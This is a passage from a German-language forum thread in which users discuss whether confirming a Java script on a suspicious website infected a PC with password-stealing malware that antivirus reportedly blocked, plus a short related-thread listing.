Wenn dein Pc tatsächlich mit Malware infiziert war, dann jedenfalls nicht von der Seite.
|
|
|
|
|
10/18/2012, 13:37
|
#30
|
elite*gold: 0
Join Date: Dec 2010
Posts: 71
Received Thanks: 15
|
Quote:
Originally Posted by defize
Du sagtest, dass du auf der Seite nichts angeklickt oder die Ausführung des Java Scripts bestätigt hast. In diesem Fall hast du dich auch 100% nicht mit Malware von der Seite infiziert. Und selbst wenn du die Ausführung bestätigt hättest, hätte jedes herkömmliche Antivirenprogramm den Virus, der dann übrigens eure Firefox Passwörter ausgelesen hätte, dann erkannt.
Wenn dein Pc tatsächlich mit Malware infiziert war, dann jedenfalls nicht von der Seite.
|
Ich habe die Ausführung bestätigt,woraufhin mein Antivir Program anging und es blockierte,also dürfte nichts passiert sein eigentlich?
|
|
|
|
Similar Threads
|
patch 5022 "virus scanner"
04/25/2008 - Conquer Online 2 - 17 Replies
post about tqs new "virus scanner" here.
EW its made in vb6.
No trojans detected. Enjoy Conquer.
Security Warning: User name is shown on log on screen.
Security Warning: This account has been locked.
Security Warning: The regedit has been modified.
Security Warning: Internet Explorer has been locked.
Security Warning: Task manager has been locked.
|
All times are GMT +1. The time now is 17:32.
|
|
